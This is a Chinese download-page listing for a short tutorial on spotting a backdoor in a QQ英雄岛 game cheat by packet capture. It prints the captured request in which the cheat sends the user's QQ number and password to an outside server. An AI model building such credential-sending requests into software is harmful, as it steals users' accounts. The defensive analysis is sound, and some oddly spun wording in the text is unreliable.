- 运行环境:Win9X/2000/XP/2003/
- 软件语言:简体中文|授权方式:免费版
- 软件类型:国产软件 - 应用软件 - 教程书籍
- 软件大小:14.42 MB
- 下载星级:
- 软件官网:暂无
- 更新时间:2009/10/23 18:02:30
【软件截图】
【基本介绍】
---------------------------------------------------
大家好, 我是 Crime
就在今天讲解的教程是 不复杂判断外挂是否有后门
今天偶然间看到一个 QQ英雄岛 的挂, 之后简单的测试一下
发现有后门, BS一下作者。 。
用到的必备工具是 WinSock Expert v0.6 beta1
这是好东西啊。 。 呵呵。 。
那, 下面就看教程吧 很短。 。 可以能够快进的。 。
最先是打开挂。 这个挂做得还是很好的。 至少乍看下, 将不会怀疑有后门。
图标精美, 但, 一看到登录界面 警惕心就上来了
一般挂好像不用用帐号登录的。 。
第一步 我们我自己用错误的帐号来登录看看。 。 。 这点来看, 他应该还是用了验证, 所以登录不上。 但没关系。 。
有验证 也有后门, 至少做的不是新手。 。 。
好, 我们用winsok来测试一下。 。 。 选择中 IME那个。 。
然后再来登录一下 随便输入 个帐号。 。 。
OK。 抓到包了。 。 。
我们来看看包。 。 。
GET /qqyxd/s/2.asp?qqnumber=1008610086&qqpassword=11111023415〓网通二区(北方)十六服 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows(窗口化操作系统system) NT 5.0)
Accept: */*
Host: yxd.g5wan.cn
Cache-Control: no-cache
Cookie: AJSTAT_ok_pages=1; AJSTAT_ok_times=1
是吧。 。 我说有后门吧。 。
yxd.g5wan.cn/qqyxd/s/2.asp?qqnumber=1008610086&qqpassword=11111023415〓网通二区(北方)十六服
这里是ASP发信的。 。 把我就在刚才输入的帐号密码发送send出去了。 。
qqnumber=1008610086
qqpassword=11111023415
〓网通二区(北方)十六服
我们用浏览器来看看。 。 。 确定有后门。 。 。 再次bS作者。 。
好了。 。 教程结束。 工具可以就在我的硬盘(电脑存储媒介)下载
hackcrime.ys168.com。 。 。 88